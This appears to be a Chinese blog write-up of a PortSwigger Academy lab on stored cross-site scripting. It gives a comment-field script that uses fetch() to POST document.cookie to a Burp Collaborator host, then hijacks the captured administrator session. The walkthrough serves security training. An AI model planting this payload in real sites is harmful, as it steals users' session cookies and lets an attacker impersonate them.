靶场内容

本实验包含博客评论功能中的存储型 XSS漏洞。一个模拟的受害者用户在发布后查看所有评论。为解决实验室,利用该漏洞窃取受害者的会话cookie,然后使用该cookie来冒充受害者。

注意
为了防止 Academy 平台被用来攻击第三方,我们的防火墙会阻止实验室与任意外部系统之间的交互。要解决实验室问题,您应该使用 Burp Collaborator 的默认公共服务器 ( burpcollaborator.net)。

一些用户会注意到这个实验室有一个不需要 Burp Collaborator 的替代解决方案。然而,它远没有泄露 cookie 那么微妙。

解决方法

  • XSS窃取Cookie老生常谈了,最喜欢用的就是窃取Cookie了
  • 这个靶场还是很细的:
  • 找到一个评论区,将JavaScript代码复制到评论区
<script>
fetch('https://8r0adoyya8wnsy5t6m21h3twenkd82.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
  • fetch里面的URL内容是Burp Collaborator Client出来的payload
  • 之后打开Burp Collaborator Client,可以发现有个HTTP报文
  • 点开它,里面是管理员的session
  • 之后使用这个cookie去覆盖home页面的cookie就可以解决战斗了

Lab: Exploiting cross-site scripting to steal cookies:利用XSS窃取Cookie相关推荐

  1. XSSF - Cross Site Scripting Framework

    2019独角兽企业重金招聘Python工程师标准>>> 跨站脚本框架 (XSSF) 是一个设计用来快速发现网站存在XSS漏洞的一个安全工具集. 该项目是为了验证网站存在的XSS漏洞及 ...

  2. Cross Site Scripting DOM攻击jQuery append() 的处理方法

    做安全红线使用Fortify工具进行扫描时,jquery append会报Cross Site Scripting DOM风险.解决该问题有两种办法. 一.原生dom方式 使用JavaScript原生 ...

  3. 【常见Web应用安全问题】---1、Cross Site Scripting

    Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些.  常见Web应用安全问题安全性问题的列表: 1.跨站脚本攻击(CSS or XSS, Cross Si ...

  4. XSS(Cross Site Scripting)攻击简介

    环境 Ubuntu 22.04 IntelliJ IDEA 2022.1.3 JDK 17.0.3.1 Spring Boot 3.0.1 Firefox 108.0.2 问题和分析 在Intelli ...

  5. Reflected Cross Site Scripting (XSS)

    前言 反射型XSS, 即 Reflected Cross Site Scripting (XSS),  攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页 ...

  6. Xss-reflected/stored跨站脚本分析(Cross site scripting)

    Xss-reflected/stored跨站脚本分析(Cross site scripting) 基础知识 针对Dom - dochtml Url概念:协议+网址/dns+端口+路径 XSS原理:对U ...

  7. DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)

    DVWA V1.9:Reflected Cross Site Scripting(存储型XSS) 存储型 XSS 介绍 Low 级别 核心代码 官方提示 漏洞利用 Medium 级别 核心代码 官方提 ...

  8. 靶场练习Exploiting cross-site scripting to steal cookies

    复制Burp Collaborator客户端中的地址 到网页的靶场把框中地址替换 将'修改过的的代码提交到网页,Burp Collaborator客户端中会出现HTTP请求,请求内容,还有盗取到的co ...

  9. CHECKMARX安全漏洞检测防止XSS(Cross Site Scripting)跨站脚本攻击

    CHECKMARX安全漏洞检测防止XSS跨站脚本攻击 总结CHECKMARX软件安全检测报告高危风险漏洞处理方式 高危警告内容 This can enable a Reflected Cross-Si ...

最新文章

  1. React系列——React Context
  2. 用户金字塔模型详解及在实际运营工作中的意义
  3. GridView中的CheckBox单击事件(oncheckedchanged)
  4. [数论-欧拉函数的应用]NEFU 1115
  5. 我的程序员之路(4)——工作半年
  6. vue开发中遇到的问题
  7. 计算机打印指定测试页到文件夹中,上海计算机等级一级考试复习指导.pptx
  8. 利用ENVI自带全球DEM数据计算区域平均高程
  9. TbSchedule的简单使用及其配置
  10. 一个专门下载全球气象站数据的网站(包括中国700多个站)
  11. Mac OS 系统的发展历史
  12. php元换成万元,元换算万元(元换算成万元换算器)
  13. C++第2周项目2——读取数据到结构体数组
  14. word中如何删除某一页上的页眉
  15. Jenkins——持续集成及Jenkins介绍和安装配置(插件,用户权限,凭据,Maven安装打包,配置tomcat用户权限)
  16. 远程连接腾讯云MySQL数据库
  17. 照度稳定可调LED台灯
  18. 将打开网页以网页 仅HTML,网页保存的不同方法
  19. 知识管理:如何让“隐形的翅膀”飞起来?
  20. 解决vc6卡死的办法就是打上官方的原版VC6sp6补丁|VS6sp6补丁

热门文章

  1. 【tips】青甘大环线收获
  2. 程序员的996工作模式,让中国互联网公司“扬名海外”
  3. 【计算机科学与技术】信息论笔记(6):微分熵
  4. 《数据安全治理白皮书3.0》正式发布(附下载)
  5. 计算机字处理设置表格,表格与文字处理软件
  6. dovecot+mysql 空壳邮件
  7. 使用go反射校验json是否符合格式
  8. 软考各科目考核内容详细介绍,看这里
  9. python3基础18
  10. A Tour of C++